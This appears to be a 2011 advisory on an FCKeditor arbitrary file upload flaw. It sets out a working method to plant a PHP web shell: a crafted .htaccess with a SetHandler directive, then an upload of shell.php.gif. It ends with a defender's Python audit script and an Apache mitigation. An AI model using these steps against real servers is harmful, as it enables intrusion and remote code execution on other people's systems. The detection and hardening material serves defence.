FCKeditor upload vulnerability (all PHP versions)
Author: anonymous | Source: compiled by this site | Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
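As an added defender-side check that is not part of the original advisory, the Python script below audits an upload directory for the two artefacts the steps above leave behind: a .htaccess that maps another extension to the PHP handler, and files whose name embeds a PHP extension before the real one (shell.php.gif, or FCKeditor's renamed form shell_php.gif). The upload tree it scans is constructed inline in a temporary directory; the regex patterns and function names are this example's own.

```python
import os
import re
import tempfile
from pathlib import Path

# Apache directives that hand a non-.php extension to the PHP interpreter.
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\s+.*php", re.I | re.M)
# A PHP-family extension sitting before the final extension, in either the
# original form (shell.php.gif) or FCKeditor's renamed form (shell_php.gif).
EMBEDDED_PHP_RE = re.compile(r"[._]ph(p\d?|tml|ar)\.", re.I)


def audit_upload_dir(root):
    """Walk root and return two sorted lists of paths relative to root:
    .htaccess files carrying a PHP handler directive, and files whose
    name embeds a PHP extension before the real one."""
    htaccess_hits, embedded_hits = [], []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower() == ".htaccess":
                text = Path(path).read_text(errors="replace")
                if HANDLER_RE.search(text):
                    htaccess_hits.append(rel)
            elif EMBEDDED_PHP_RE.search(name):
                embedded_hits.append(rel)
    return sorted(htaccess_hits), sorted(embedded_hits)


def demo():
    """Constructed sample upload tree mirroring the advisory's artefacts."""
    root = tempfile.mkdtemp()
    Path(root, ".htaccess").write_text(
        '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n')
    Path(root, "shell_php.gif").write_bytes(b"GIF89a")          # renamed upload
    Path(root, "sub").mkdir()
    Path(root, "sub", "shell.php.gif").write_bytes(b"GIF89a")   # original form
    Path(root, "photo.gif").write_bytes(b"GIF89a")              # benign file
    return audit_upload_dir(root)


if __name__ == "__main__":
    htaccess, embedded = demo()
    print("handler-overriding .htaccess:", htaccess)
    print("embedded PHP extension:", embedded)
```

Setting AllowOverride None for the upload directory in the Apache configuration stops an uploaded .htaccess from being honoured at all, which removes the precondition for step 1 regardless of what the editor's filename filter does.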